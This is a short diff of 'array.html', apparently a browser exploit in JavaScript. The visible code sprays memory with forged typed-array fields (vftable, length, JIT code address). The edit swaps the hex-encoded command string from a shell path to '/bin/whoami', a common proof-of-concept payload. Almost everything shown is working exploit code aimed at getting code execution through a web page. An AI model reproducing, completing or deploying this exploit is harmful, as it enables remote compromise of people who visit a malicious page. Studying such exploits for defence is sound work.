--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start6686");
+alert("start686");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -157,10 +157,10 @@ for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
 spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
-spray[spray_index][typedarray_index+0x40/4]=0x2D63692F;
-spray[spray_index][typedarray_index+0x44/4]=0x73616C73;
-spray[spray_index][typedarray_index+0x48/4]=0x69622D68;
-spray[spray_index][typedarray_index+0x4c/4]=0x68732F6E;
+spray[spray_index][typedarray_index+0x40/4]=0x6E69622F;
+spray[spray_index][typedarray_index+0x44/4]=0x6F68772F;
+spray[spray_index][typedarray_index+0x48/4]=0x00696D61;
+spray[spray_index][typedarray_index+0x4c/4]=0x0;
 spray[spray_index][typedarray_index+0x50/4]=0x0;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
